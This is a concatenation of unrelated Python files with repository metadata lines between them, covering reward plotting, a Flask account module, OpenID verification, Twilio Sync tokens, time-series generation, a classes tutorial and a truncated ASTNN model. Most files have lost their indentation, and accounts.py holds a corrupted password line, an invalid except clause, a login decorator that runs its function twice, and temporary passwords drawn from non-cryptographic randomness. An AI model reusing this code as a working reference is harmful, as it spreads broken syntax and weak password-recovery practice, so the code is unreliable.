ax0.set_title("Expert's Rewards")
ax0.invert_yaxis()
data = np.array(mdp.get_grid())
ax1.pcolor(data, cmap=plt.cm.RdYlGn)
ax1.set_title("Reward Estimations")
ax1.invert_yaxis()
ax2.plot(range(birl.birl_iteration), policy_error, 'ro')
ax2.set_title('Policy change')
ax3.plot(range(birl.birl_iteration), reward_error, 'bo')
ax3.set_title('Reward change')
plt.tight_layout()
plt.savefig(directory_name + "/run" + str(i) + ".png")
def run_multiple_birl(birl, expert_mdp, expert_trace, number_of_iteration):
"""Run BIRL algorithm number_of_iteration times.
"""
directory_name = initialize_output_directory(birl)
for i in range(number_of_iteration):
pi, mdp, policy_error, reward_error = birl.run_birl()
plot_errors(policy_error, reward_error, directory_name, birl, i, expert_mdp, mdp)
print("Run :" + str(i))
print_reward_comparison(mdp, pi, expert_mdp, expert_trace)
print_error_sum(mdp, birl, expert_mdp)
def initialize_output_directory(birl):
directory_name = 'outputs/iter' + str(birl.birl_iteration) + \
'_stepsize' + str(birl.step_size) + '_no' + str(randint(0, 2 ** 30))
if not os.path.exists(directory_name):
os.makedirs(directory_name)
return directory_name
def print_reward_comparison(mdp, pi, expert_mdp, expert_trace):
print_table(mdp.to_arrows(pi))
print "vs"
print_table(mdp.to_arrows(expert_trace))
print("Policy difference is " + str(get_policy_difference(pi, expert_trace)))
mdp.print_rewards()
print "vs"
expert_mdp.print_rewards()
def print_error_sum(mdp, birl, expert_mdp):
print ("Total Error: " + str(normalize_by_max_reward(calculate_error_sum(mdp, expert_mdp), birl)))
print "---------------"
def print_sse(mdp, expert_trace):
print ("Reward SSE: " + str(calculate_sse(mdp, expert_trace)))
print "---------------"
def normalize_by_max_reward(value, birl):
if birl.r_max != abs(birl.r_min):
raise Exception("Normalization cannot be done. r_min and r_max values have different abs sums!")
return value / float(birl.r_max)
def calculate_sse(mdp1, mdp2):
"Returns the sum of the squared errors between two reward functions"
sse = 0
if not (mdp1.cols == mdp2.cols and mdp1.rows == mdp2.rows):
raise Exception("Mismatch between # of rows and columns of reward vectors")
for x in range(mdp1.cols):
for y in range(mdp1.rows):
sse += (mdp1.reward[x, y] - mdp2.reward[x, y]) ** 2
return sse
def calculate_error_sum(mdp1, mdp2):
"""Returns the sum of errors between two reward functions
Sum is normalized with respect to the number of states
"""
sum = 0
if not (mdp1.cols == mdp2.cols and mdp1.rows == mdp2.rows):
raise Exception("Mismatch between # of rows and columns of reward vectors")
for x in range(mdp1.cols):
for y in range(mdp1.rows):
sum += abs(mdp1.reward[x, y] - mdp2.reward[x, y])
return sum / (float(mdp1.cols * mdp1.rows))
def get_policy_difference(new_pi, ex_pi):
shared_items = set(new_pi.items()) & set(ex_pi.items())
return len(new_pi.items()) - len(shared_items)
if __name__ == "__main__":
main() | 2.515625 | 3 |
fixipy/__init__.py | Jaydabi/pyfix | 0 | 12786474 | <gh_stars>0
from .Message import Message
| 1.085938 | 1 |
accounts.py | qwerith/Weather-Project | 0 | 12786475 | <gh_stars>0
import psycopg2
import os
import re
import string
import random
import logging
from dotenv import load_dotenv, find_dotenv
from flask_bcrypt import Bcrypt
from flask import redirect, session
bcrypt = Bcrypt()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
formatter = logging.Formatter("""%(asctime)s:%(name)s:
%(filename)s:%(funcName)s:
%(levelname)s:%(message)s""")
handler = logging.FileHandler("logs.log")
handler.setFormatter(formatter)
handler.setLevel(logging.INFO)
logger.addHandler(handler)
#loading environment variables
try:
load_dotenv(find_dotenv())
con = psycopg2.connect(host = os.getenv("HOST"), database = os.getenv("DATABASE"),
user = os.getenv("USER"), password = os.<PASSWORD>("<PASSWORD>"),
port=5432)
cur = con.cursor()
except RuntimeError("Database credentials error"):
logger.exception("Database credentials error")
raise
class Accounts():
"""Manages user accounts, queries data for session module, password changes and recovery"""
def __init__(self, email, password):
self.email = email.strip(" ")
self.password = password.strip(" ")
def register(self, username):
try:
con = psycopg2.connect(host = os.getenv("HOST"), database = os.getenv("DATABASE"),
user = os.getenv("USER"), password = os.getenv("db_PASSWORD"),
port=5432)
cur = con.cursor()
except:
logger.error(RuntimeError("Database credentials error"))
raise RuntimeError("Database credentials error")
cur.execute("SELECT EXISTS(SELECT 1 FROM users WHERE email = %s LIMIT 1)", (self.email, ))
con.commit()
result = cur.fetchall()
if result[0][0] != False:
return ["Account already exists"]
else:
try:
cur.execute("""INSERT INTO users (username, email, password)
VALUES ( %s, %s, %s )""",(username.strip(" "), self.email,
bcrypt.generate_password_hash(self.password).decode("utf-8")))
con.commit()
con.close()
return ["Your account has been successfully created"]
except:
con.close()
return ["Registration failed"]
def user_verification(self):
cur.execute("SELECT id, username, email, password FROM users WHERE email=%s LIMIT 1",
(self.email, ))
con.commit()
user = cur.fetchall()
if user and bcrypt.check_password_hash(user[0][3], self.password):
return(True, user)
else:
return None
def delete(self):
cur.execute("DELETE FROM users WHERE email=%s", (self.email, ))
con.commit()
def change_password(self, new_password):
cur.execute("UPDATE users SET password=%s WHERE email=%s",
(bcrypt.generate_password_hash(new_password).decode("utf-8"), self.email))
con.commit()
def restore_password(self, temp_password_hash, temp_password):
if bcrypt.check_password_hash(temp_password_hash, temp_password):
cur.execute("UPDATE users SET password=%s WHERE email=%s",
(bcrypt.generate_password_hash(self.password).decode("utf-8"), self.email))
con.commit()
return True
return None
# Generates random password for recovery process
def generate_temporary_password(email):
cur.execute("SELECT EXISTS(SELECT 1 FROM users WHERE email = %s LIMIT 1)", (email, ))
con.commit()
result = cur.fetchall()
if result[0][0] != False:
chars = string.ascii_uppercase + string.ascii_lowercase + string.digits
size = random.randint(5, 10)
temp_password = ''.join(random.choice(chars) for x in range(size))
password_hash = bcrypt.generate_password_hash(temp_password).decode("utf-8")
return password_hash, temp_password
return None, ""
def input_validation(user_input):
#regex form for email validation
try:
len(user_input) > 1
for i in user_input:
if type(i) != str:
return ["Invalid data type"]
except IndexError:
logger.error(IndexError)
raise
response = []
email_pattern = r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
punctuation = """[!#$%&'()*+, -./:;"<=>?@[\]^_`{|}~:]"""
if not (re.match(email_pattern, user_input[0])):
response.append("Invalid email")
if (not len(user_input[1]) >= 5 and len(user_input[1]) <= 10 or
re.findall(punctuation, user_input[1]) != []):
response.append("Password must be 5 to 10 characters long")
if len(user_input) == 3:
if not user_input[1] == user_input[2] or re.findall(punctuation, user_input[2]) != []:
response.append("Passwords do not match")
if len(user_input) == 4:
if not user_input[2] == user_input[3] or re.findall(punctuation, user_input[3]) != []:
response.append("Passwords do not match")
return response
def login_required(func):
def wrapper(*args, **kwargs):
if session.get("user_id") != None:
func(*args, **kwargs)
return func(*args, **kwargs)
return redirect("/login")
return wrapper
| 2.34375 | 2 |
resetpwd/models.py | catbei2020/ad-password-self-service | 1 | 12786476 | <filename>resetpwd/models.py
from django.db import models
from django import forms
from django.contrib import auth
| 1.304688 | 1 |
vk_bot/mods/yourphoto/getcommand.py | triangle1984/GLaDOS | 3 | 12786477 | <gh_stars>1-10
from vk_bot.core.modules.basicplug import BasicPlug
from vk_bot.core.modules.othermethods import OtherMethod
from vk_bot.core.sql.vksql import *
class Getcommand(BasicPlug, OtherMethod):
doc = "вытащить команду"
types = 'commandb'
@staticmethod
def getcommand(uid, command):
if bool(command) == False:
return
check = checktable("yourphoto", "id", uid, andd=f"command = '{command}'")
if check:
return check["command"]
else:
return 666
def main(self):
check = checktable("yourphoto", "id", self.uid, andd=f"command = '{self.text[0]}'")
if check:
public = check["public"]
public = public.split(",")
photos = self.phootowallrandom(public)
self.sendmsg("Пикча из личного альбома~", photos)
| 2.296875 | 2 |
src/graphql/document/field_query.py | btrekkie/graphql | 0 | 12786478 | class GraphQlFieldQuery(object):
"""A request for the value of a GraphQL object's field.
dict<basestring, object> args - The arguments to the field. The
entries are the Python object representations of the arguments'
values, with GraphQlVariableReference objects for variable
references. The entries are not None and do not contain the
value None.
list<GraphQlDirective> directives - The directives for the field
query.
FieldDescriptor field_descriptor - The description of the field we
are querying.
basestring response_key - The key that maps to the field's value in
the GraphQL response.
GraphQlSelectionSet selection_set - The selection set indicating the
information to request from the field.
"""
def __init__(
self, response_key, field_descriptor, arguments, selection_set,
directives):
self.response_key = response_key
self.field_descriptor = field_descriptor
self.args = arguments
self.selection_set = selection_set
self.directives = directives
| 2.546875 | 3 |
01-Lesson-Plans/03-Python/3/Activities/08-Par_GraduatingFunctions/Unsolved/graduation_functions.py | anirudhmungre/sneaky-lessons | 0 | 12786479 | <reponame>anirudhmungre/sneaky-lessons
import os
import csv
# Path to collect data from the Resources folder
# Define the function and have it accept the 'state_data' as its sole parameter
# Find the total students
# Find the total graduates
# Find the public school graduation rate
# Remember that some states do not have nonprofit or forprofit private schools
# Find the non-profit school graduation rate
# Find the for-profit school graduation rate
# Calculate the overall graduation rate
# Print out the state's name and its graduation rates
# Read in the CSV file
with open(graduation_csv, 'r') as csvfile:
# Split the data on commas
csvreader = csv.reader(csvfile, delimiter=',')
header = next(csvreader)
# Prompt the user for what state they would like to search for
state_to_check = input("What state do you want to look for? ")
# Loop through the data
for row in csvreader:
# If the state's name in a row is equal to that which the user input, run the 'print_percentages()' function
if state_to_check == row[0]:
print_percentages(row)
| 4.15625 | 4 |
examples/Multiple-time-series.py | KikeM/time-series-generator | 6 | 12786480 | # ---
# jupyter:
# jupytext:
# formats: ipynb,md,py:percent
# text_representation:
# extension: .py
# format_name: percent
# format_version: '1.3'
# jupytext_version: 1.4.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %% [markdown]
# Add to the path the generator folder.
# %%
import sys
from pathlib import Path
path = Path("../generator")
sys.path.insert(0, path.as_posix())
pwd = path.parent
# %%
import pandas as pd
from generator import TimeSeriesGenerator
# %%
NUMBER_SERIES = 10
NUMBER_DAYS = 260
# %%
configuration = {
"meta": {
"number_of_observations": NUMBER_DAYS,
"path": "./timeseries/",
"time_series_name": "01-base",
},
"base_line": {"base": 10, "variance": 2},
"timestamps": {"start": 0, "step": 1},
"trend": {"slope": 0.1},
"season": {"height": 5, "period": 21},
"breaks": [{"from": 10, "to": 100, "value": 10}],
}
# %%
# Generate time series
generator = TimeSeriesGenerator(configuration["meta"])
series = []
for number in range(1, NUMBER_SERIES + 1):
# Add randomness to differentiate the time series
configuration["base_line"]["base"] = np.random.randint(low=10, high=50)
configuration["trend"]["slope"] = 0.35 * np.random.rand()
configuration["season"]["height"] = np.abs(5 * np.random.rand())
configuration["season"]["period"] = np.random.randint(low=21, high=120)
configuration["breaks"][0]["from"] = np.random.randint(low=21, high=120)
configuration["breaks"][0]["to"] = np.random.randint(
low=configuration["breaks"][0]["from"], high=NUMBER_DAYS
)
configuration["breaks"][0]["value"] = np.random.randint(low=5, high=10)
generator.generate(configuration)
ts = generator.get_business_like()
ts.name = number
series.append(ts)
# Collect all time series
prices_df = pd.DataFrame(series).T
prices_df.index.name = "date"
# %%
prices_df.plot()
| 2.515625 | 3 |
besspin/cyberPhys/cyberphyslib/tests/test_canout.py | mikkowus/BESSPIN-Tool-Suite | 0 | 12786481 | """
Project: SSITH CyberPhysical Demonstrator
Name: test_canout.py
Author: <NAME>
Date: 08 April 2021
Tests for the cyberphys can location poller
"""
import cyberphyslib.demonstrator.can_out as ccout
import cyberphyslib.demonstrator.component as ccomp
from cyberphyslib.demonstrator.handler import ComponentHandler
import time
def test_canout():
"""test the canout service
operational tests:
1. start / stop
failure mode tests:
<None>
"""
# simple start / stop
# TODO: conduct more tests
handler = ComponentHandler()
msg = handler.start_component(ccout.CanOutPoller(None))
assert msg == ccomp.ComponentStatus.READY
handler.exit()
| 2.140625 | 2 |
openid_wargaming/verification.py | mac-developer/WargamingOpenID | 4 | 12786482 | <filename>openid_wargaming/verification.py
"""OpenID 2.0 - Verifiying Assertions
Ref: https://openid.net/specs/openid-authentication-2_0.html#verification
"""
from urllib.parse import urlparse, parse_qs, urlencode
from requests import post
from .exceptions import BadOpenIDReturnTo, OpenIDFailReturnURLVerification
from .exceptions import OpenIDVerificationFailed
from .utils import nonce_saver, nonce_reader
class Verification:
"""OpenID data verification.
Receive a return OpenID URL
Note:
Based on OpenID specification
https://openid.net/specs/openid-authentication-2_0.html
Args:
assertion_url
evidence
Attributes:
assertion
Args:
assertion_url
saver: function reference which accepts one argument (data/payload)
and returns True if was saved.
reader: function reference which accepts one argument
(openid.response_nonce) and check if exists on reader
backend. Returns True if exists.
"""
def __init__(self, assertion_url, evidence=None, saver=None, reader=None):
self.assertion = urlparse(assertion_url)
self.saver = saver or nonce_saver
self.reader = reader or nonce_reader
@property
def return_to(self):
key = 'openid.return_to'
query = parse_qs(self.assertion.query)
if key in query:
return urlparse(query[key][0])
else:
return None
def is_positive_assertion(self):
"""Positive Assertions
Reference: https://openid.net/specs/openid-authentication-2_0.html
Section: 10.1
Verify 'id_res' as positive assertion.
Returns:
reason - When negative assertion
"""
key = 'openid.mode'
query = parse_qs(self.assertion.query)
if key in query:
mode = query[key][0]
else:
raise BadOpenIDReturnTo("return_to url doesn't look to OpenID url",
query)
if mode == 'id_res':
return True
else:
self.reason = mode
return False
def verify_return_url(self):
"""OpenID Verifying the Return URL
Reference: https://openid.net/specs/openid-authentication-2_0.html#verification
Section: 11.1
To verify that the "openid.return_to" URL matches the URL that is
processing this assertion:
* The URL scheme, authority, and path MUST be the same between
the two URLs.
* Any query parameters that are present in the "openid.return_to"
URL MUST also be present with the same values in the URL of the
HTTP request the RP received.
"""
if self.assertion.scheme != self.return_to.scheme or \
self.assertion.netloc != self.return_to.netloc or \
self.assertion.path != self.return_to.path:
reason = 'scheme/authority/path are not the same'
raise OpenIDFailReturnURLVerification(reason)
query_parameters = parse_qs(self.return_to.query)
assertion_parameters = parse_qs(self.assertion.query)
for parameter, value in query_parameters.items():
if parameter in assertion_parameters:
if value[0] != assertion_parameters[parameter][0]:
reason = 'parameter %s has not the same value' % parameter
raise OpenIDFailReturnURLVerification(reason)
else:
reason = 'parameter %s is not present' % parameter
raise OpenIDFailReturnURLVerification(reason)
return True
def verify_discovered_information(self):
"""OpenID Verifying Discovered Information **NOT IMPLEMENTED**
Reference: https://openid.net/specs/openid-authentication-2_0.html#verification
Section: 11.2
"""
return True
def check_nonce(self):
"""OpenID Checking the None.
To prevent replay attacks, the agent checking the signature keeps
track of the nonce values included in positive assertions and never
accepts the same value more than once for the same OP Endpoint URL.
Reference: https://openid.net/specs/openid-authentication-2_0.html#verification
Section: 11.3
"""
nonce = parse_qs(self.assertion.query)['openid.response_nonce'][0]
if not self.reader(nonce):
self.saver(nonce)
return True
else:
return False
def verify_signatures(self):
"""OpenID Verifying Signatures (Wargaming uses Direct Verification).
To have the signature verification performed by the OP,
the Relying Party sends a direct request to the OP.
To verify the signature, the OP uses a private association that
was generated when it issued the positive assertion.
Reference: https://openid.net/specs/openid-authentication-2_0.html#verification
Section: 11.4.2
"""
# Note: This header is very important to allow this application works
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
query = parse_qs(self.assertion.query)
# Change openid.mode to check the signature
query['openid.mode'][0] = 'check_authentication'
# Flatten query object. Remove list and get the [0] element
query = {key: value[0] for key, value in query.items()}
to_sign = urlencode(query)
# Verification Request
request = post(self.op_endopint, to_sign, allow_redirects=False,
headers=headers)
# Verification parsing
verification = self.parse_l2l(request.text)
return verification.get('is_valid', False)
def identify_the_end_user(self):
"""OpenID Identifying the end user.
The Claimed Identifier in a successful authentication
response SHOULD be used by the Relying Party as a key for local
storage of information about the user. The Claimed Identifier MAY
be used as a user-visible Identifier.
When displaying URL Identifiers, the fragment MAY be omitted.
Reference: https://openid.net/specs/openid-authentication-2_0.html#verification
Section: 11.5
Field: openid.identity and openid.claimed_id
"""
query = parse_qs(self.assertion.query)
return {
'identity': query['openid.identity'][0],
'claimed_id': query['openid.claimed_id'][0],
}
def parse_l2l(self, response):
"""Parse line by line OpenID response.
Example:
is_valid:false
ns:http://specs.openid.net/auth/2.0
"""
cleaned = response.strip().split('\n')
return {fields.split(':')[0].strip():
self.convert_type(''.join(fields.split(':')[1:]).strip())
for fields in cleaned}
def convert_type(self, value):
TYPES = {
'false': False,
'true': True
}
return TYPES.get(value, value)
def verify(self):
"""Process to verify an OpenID assertion.
This is the last step, you'll get a positive identification
or a failure.
Returns:
Identification
"""
validators = [self.is_positive_assertion,
self.verify_return_url,
self.verify_discovered_information,
self.check_nonce,
self.verify_signatures]
for validator in validators:
is_valid = validator()
if not is_valid:
name = validator.__name__
reason = 'Validation fail on %s' % name
raise OpenIDVerificationFailed(reason, name)
return self.identify_the_end_user()
@property
def op_endopint(self):
query = parse_qs(self.assertion.query)
return query['openid.op_endpoint'][0]
| 3.015625 | 3 |
src/aeml/models/tcn/forecast.py | kjappelbaum/aeml | 0 | 12786483 | # -*- coding: utf-8 -*-
from functools import partial
import numpy as np
import pandas as pd
def summarize_results(results):
values = []
for df in results:
values.append(df.pd_dataframe().values)
df = df.pd_dataframe()
columns = df.columns
return (
pd.DataFrame(np.mean(values, axis=0), columns=columns, index=df.index),
pd.DataFrame(np.std(values, axis=0), columns=columns, index=df.index),
)
def _run_backtest(
rep, model, x_test, y_test, start=0.3, stride=1, horizon=4, enable_mc_dropout=True
):
backtest = model.historical_forecasts(
y_test,
past_covariates=x_test,
start=start,
forecast_horizon=horizon,
stride=stride,
retrain=False,
verbose=False,
enable_mc_dropout=enable_mc_dropout,
)
return backtest
def parallelized_inference(
model, x, y, repeats=100, start=0.3, stride=1, horizon=6, enable_mc_dropout=True
):
results = []
backtest_partial = partial(
_run_backtest,
model=model,
x_test=x,
y_test=y,
start=start,
stride=stride,
horizon=horizon,
enable_mc_dropout=enable_mc_dropout,
)
for res in map(backtest_partial, range(repeats)):
results.append(res)
return results
def _run_forcast(_, model, x_full, y_past, future_len, enable_mc_dropout=True):
return model.predict(
future_len, series=y_past, past_covariates=x_full, enable_mc_dropout=enable_mc_dropout
)
def forecast(model, x_full, y_past, future_len, repeats=100, enable_mc_dropout=True):
results = []
backtest_partial = partial(
_run_forcast,
model=model,
x_full=x_full,
y_past=y_past,
future_len=future_len,
enable_mc_dropout=enable_mc_dropout,
)
for res in map(backtest_partial, range(repeats)):
results.append(res)
return results
| 2.5625 | 3 |
app.py | TwilioDevEd/sync-quickstart-python | 2 | 12786484 | <reponame>TwilioDevEd/sync-quickstart-python<gh_stars>1-10
import os
from flask import Flask, jsonify, request, send_from_directory
from faker import Factory
from twilio.jwt.access_token import AccessToken
from twilio.jwt.access_token.grants import SyncGrant
app = Flask(__name__)
fake = Factory.create()
@app.route('/')
def index():
return app.send_static_file('index.html')
@app.route('/<path:path>')
def send_js(path):
return send_from_directory('static', path)
@app.route('/token')
def token():
# get credentials for environment variables
account_sid = os.environ['TWILIO_ACCOUNT_SID']
api_key = os.environ['TWILIO_API_KEY']
api_secret = os.environ['TWILIO_API_SECRET']
service_sid = os.environ['TWILIO_SYNC_SERVICE_SID']
# create a randomly generated username for the client
identity = fake.user_name()
# Create access token with credentials
token = AccessToken(account_sid, api_key, api_secret, identity)
# Create a Sync grant and add to token
sync_grant = SyncGrant(service_sid=service_sid)
token.add_grant(sync_grant)
# Return token info as JSON
return jsonify(identity=identity, token=token.to_jwt())
if __name__ == '__main__':
app.run(port=4567, debug=True, threaded=True)
| 2.4375 | 2 |
{{ cookiecutter.package_name }}/tests/test_config.py | triaxtec/fastapi-serverless-cookiecutter | 15 | 12786485 | def test_get_config_aws_load(mocker):
from {{ cookiecutter.module_name }} import config
AWSSource = mocker.patch.object(config, "AWSSource", return_value={"custom_key": "custom_value"})
mocker.patch.object(config, "_app_config", None)
config = config.get_config({"env": "testing"})
AWSSource.assert_called_once_with("{{ cookiecutter.module_name }}/testing")
assert config["custom_key"] == "custom_value"
| 2.25 | 2 |
Classes and Inheritance.py | PiusLucky/python-classes | 1 | 12786486 | <reponame>PiusLucky/python-classes
# Example of a simple class
class Car:
tire_numbers = 4
sterling_color = "Black"
speed = "100–120 km/h"
# simple class with one method
class Car:
tire_numbers = 4
sterling_color = "Black"
speed = "100–120 km/h"
def check_speed(self):
return self.speed
# simple class with two methods
class Car:
tire_numbers = 4
sterling_color = "Black"
speed = "100–120 km/h"
def check_speed(self):
return self.speed # we access the class attribute with the "self" keyword
def check_tires_count(self):
return self.tire_numbers # we access the class attribute with the "self" keyword
# 'my_car' is an object
my_car = Car() # class instantiation
# We could access Class Car variables like so:
print(my_car.tire_numbers)
# Quick Tip
# To call a function, use the function name followed by parenthesis
# check_speed is a method of the class Car.
print(my_car.check_speed())
# Results from console
# 4
# 100–120 km/h
# [Finished in 0.5s]
# print(dir(Car))
# Results from console
# ['__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', 'check_speed', 'check_tires_count', 'speed', 'sterling_color', 'tire_numbers']
# ['__class__', '__delattr__', '__dict__', '__dir__', '__doc__', '__eq__', '__format__', '__ge__', '__getattribute__', '__gt__', '__hash__', '__init__', '__init_subclass__', '__le__', '__lt__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', 'check_speed', 'check_tires_count', 'speed', 'sterling_color', 'tire_numbers']
# non-argument class - a class that requires no argument
class Car:
def __init__(self, tire_numbers=4, sterling_color="Black", speed="100–120 km/h"): # __init__ method
self.tire_numbers = tire_numbers
self.sterling_color = sterling_color
self.speed = speed
def check_speed(self):
return self.speed # we access the class attribute with the "self" keyword
def check_tires_count(self):
return self.tire_numbers # we access the class attribute with the "self" keyword
my_car = Car() # class instantiation
print("Car class with", my_car.tire_numbers, "tires") # Car class with 4 tires
print("Car class with", my_car.sterling_color, "sterling") # Car class with Black sterling
print("Car class with", my_car.speed, "of speed") # Car class with 100–120 km/h of speed
# argumennt class - a class that requires arguments
class Car:
def __init__(self, tire_numbers, sterling_color, speed): # __init__ method with self & 3 parameters
self.tire_numbers = tire_numbers
self.sterling_color = sterling_color
self.speed = speed
def check_speed(self):
return self.speed # we access the class attribute with the "self" keyword
def check_tires_count(self):
return self.tire_numbers # we access the class attribute with the "self" keyword
my_car = Car(4, "Black", "100–120 km/h") # class instantiation with arguments
print("Car class with", my_car.tire_numbers, "tires") # Car class with 4 tires
print("Car class with", my_car.sterling_color, "sterling") # Car class with Black sterling
print("Car class with", my_car.speed, "of speed") # Car class with 100–120 km/h of speed
# function
def add_number(first_number, second_number):
addition = first_number + second_number # addition logic
print(addition)
return addition
add_number(2, 4) # 6
# equivalent class
class AddNumber:
def __init__(self, first_number, last_number): # __init__ method with self & 2 parameters
self.first_number = first_number
self.last_number = last_number
def add_number(self):
addition = self.first_number + self.last_number # addition logic
return addition
# instantiating the AddNumber class
add_number_object = AddNumber(2, 4) # object
# call the add_number method
print(add_number_object.add_number()) # 6
# class inheritance
# BaseClass
class Father:
def __init__(self, fathers_firstname): # Base __init__ method with self & 1 parameter
self.fathers_firstname = fathers_firstname
def get_first_name(self):
return "Father " + self.fathers_firstname
# Derived Class
class Child_1(Father):
# Derived __init__ method with self & 1 base parameter & 1 derived class parameter
def __init__(self, fathers_firstname, childs_firstname):
# Pass in all the attributes of the base class into the super() init function [they are all required]
super().__init__(fathers_firstname)
# You don't need to initialize the base class attributes, just the new attribute needs initializing
self.childs_firstname = childs_firstname # initializing the new attribute
# method
def get_my_first_name(self):
my_name = self.childs_firstname
return "Child" + " " + my_name
# method
def get_my_last_name(self): # Equal to get_first_name in BaseClass
last_name = super(Child_1, self).get_first_name() # Python 2 - super(className,object)
last_name = super().get_first_name() # Python 3 equivalent
return last_name
# method
def get_my_full_name(self):
return self.get_my_first_name() + " & " + self.get_my_last_name()
Child_1_object = Child_1("Pius", "Lucky") # instantiating the Child_1 class
print(Child_1_object.get_my_full_name()) # Child Lucky & Father Pius
# multiple class inheritance
# BaseClass 1
class Father:
def __init__(self, fathers_firstname): # Base __init__ method with self & 1 parameter
self.fathers_firstname = fathers_firstname
def get_first_name(self):
return self.fathers_firstname
# BaseClass 2
class Child_1:
def __init__(self, child_1_name, hobby):
self.child_1_name = child_1_name
self.hobby = hobby
def get_child1_name(self):
return self.child_1_name
def get_child1_hobby(self):
return self.hobby
# Derived Class
class Child_2(Father, Child_1):
"""
Child_2 class takes in two string parameters denoting the Father Class and Child_1 class as Base Class
Father: str
Child_1: str
"""
def __init__(self, fathers_firstname, child_1_name, hobby, childs_2_firstname):
# overriding fathers_firstname defined in Child_2 __init__() by the fathers_firstname defined in the Father __init__()
Father.__init__(self, fathers_firstname)
# overriding child_1_name & hobby defined in Child_2 __init__() by the child_1_name & hobby defined in the Child_1 __init__()
Child_1.__init__(self, child_1_name, hobby)
self.childs_2_firstname = childs_2_firstname # initializing the new attribute
# method
def get_my_first_name(self):
my_name = self.childs_2_firstname
return my_name
# method
def get_my_last_name(self): # Equal to get_first_name in BaseClass Father
last_name = super(Child_2, self).get_first_name() # Python 2 - super(className, object)
last_name = super().get_first_name() # Python 3 equivalent
return last_name
# method
def get_my_full_name(self):
return "{0} {1}".format(self.get_my_first_name(), self.get_my_last_name())
# method
def get_my_sibling_attributes(self):
sibling_name = super().get_child1_name() # Python 3 equivalent
sibling_hobby = super().get_child1_hobby() # Python 3 equivalent
return sibling_name + " & she likes " + sibling_hobby
# method
def about_me(self):
my_full_name = self.get_my_full_name()
my_sibling_name = self.get_my_sibling_attributes()
return "My name is {0}, I have a sibling called {1}".format(self.get_my_full_name(), self.get_my_sibling_attributes())
Child_2_object = Child_2("Pius", "Happy", "dancing", "Lucky") # instantiating the Child_2 class
print(Child_2_object.about_me()) # My name is <NAME>, I have a sibling called Happy & she likes dancing
# BONUS TIPS:
# __doc__
# Use this to get the document string of a particular class
print(Child_2.__doc__)
# Output:
# Child_2 class takes in two string parameters denoting the Father Class and Child_1 class as Base Class
# Father: str
# Child_1: str
# __subclasses__
print(Father.__subclasses__())
# Output:
# [<class '__main__.Child_2'>]
# Implication
# This means that Child_2 Class depends on the Father Class
print(Child_1.__subclasses__())
# Output:
# [<class '__main__.Child_2'>]
# Implication
# This means that Child_2 Class depends on the Father Class
# issubclass
print(issubclass(Child_2, Father))
# Output:
# True
# Implication
# This means that Child_2 Class depends on the Father Class
# relationship b/w self and object (or class instance)
class Worker:
def __init__(self, salary):
self.salary = salary
# method
def salary_checker(self):
my_salary = self.salary # self is the representation of the Worker Object inside the class [self is an instance of the class]
print(my_salary) # 5000
return my_salary
worker_object = Worker(5000)
worker_salary = worker_object.salary_checker() # "worker_salary" is the representation of the Worker object (worker_object) outside of the class [object is an instance of a class]
print(worker_salary) #5000
# NOTE:
# "worker_salary" is the representation of the object outside of the class
# "self" is the representation of the object inside the class.
# "self" & "object" both return the same result, 5000. | 4.25 | 4 |
pytheas/__about__.py | benvial/pytheas | 10 | 12786487 | from datetime import date
__version__ = "1.3.1"
__author__ = u"<NAME>"
__author_email__ = "<EMAIL>"
__copyright__ = u"Copyright (c) 2017-{}, {} <{}>".format(
date.today().year, __author__, __author_email__
)
__website__ = "https://benvial.github.io/pytheas"
__license__ = "License :: OSI Approved :: MIT License"
__status__ = "Development Status :: 5 - Production/Stable"
__description__ = (
"Python Electromagnetic Analysis and Simulation with the Finite Element Method"
)
| 1.734375 | 2 |
cl_astnn.py | yemao616/Cross-Lingual-Adversarial-Domain-Adaptation | 0 | 12786488 | <filename>cl_astnn.py
import torch
import torch.nn as nn
from torch.autograd import Variable
from tlstm import TLSTM
from astnn import ASTNN
class CrossLing(nn.Module):
"""
Cross-Language ASTNN Model
"""
def __init__(self, args):
super(CrossLing, self).__init__()
self.with_target_domain = args['with_target_domain']
self.mASTNN = ASTNN(args)
self.nASTNN = ASTNN(args)
self.sharedASTNN = ASTNN(args)
self.grl = GradientReversal(args['lambda'])
self.discriminator = Classifier(args['hidden_dim'], args['domain_size'])
self.shared2label = Classifier(args['hidden_dim'], args['label_size'])
self.m2label = Classifier(args['hidden_dim'], args['label_size'], True)
self.n2label = Classifier(args['hidden_dim'], args['label_size'], True)
def forward(self, m, n, m_share=None, n_share=None, t=None):
# private ASTNN
m_hidden = self.mASTNN(m)
n_hidden = self.nASTNN(n)
# shared ASTNN
if m_share:
m_shared_hidden = self.sharedASTNN(m_share)
else:
m_shared_hidden = self.sharedASTNN(m)
if n_share:
n_shared_hidden = self.sharedASTNN(n_share)
else:
n_shared_hidden = self.sharedASTNN(n)
# private classifier
m_prediction = self.m2label(torch.cat([m_hidden, m_shared_hidden], dim=1))
n_prediction = self.n2label(torch.cat([n_hidden, n_shared_hidden], dim=1))
# Discriminator
m_domain = self.discriminator(self.grl(m_shared_hidden))
n_domain = self.discriminator(self.grl(n_shared_hidden))
# shared classifier
m_shared_prediction = self.shared2label(m_shared_hidden)
n_shared_prediction = self.shared2label(n_shared_hidden)
m_output = [m_domain, m_prediction, m_shared_prediction, m_hidden, m_shared_hidden]
n_output = [n_domain, n_prediction, n_shared_prediction, n_hidden, n_shared_hidden]
if self.with_target_domain and t:
t_shared_hidden = self.sharedASTNN(t) # pass shared ASTNN
t_domain = self.discriminator(self.grl(t_shared_hidden)) # pass discriminator
t_output = t_domain
return m_output, n_output, t_output
return m_output, n_output
def forward_predict(self, inputs, switch):
"""
cl-astnn function to generate input for different switch (domain)
"""
if switch == 'm':
m_hidden = self.mASTNN(inputs)
m_shared_hidden = self.sharedASTNN(inputs)
output = self.m2label(torch.cat([m_hidden, m_shared_hidden], dim=1))
elif switch == 'n':
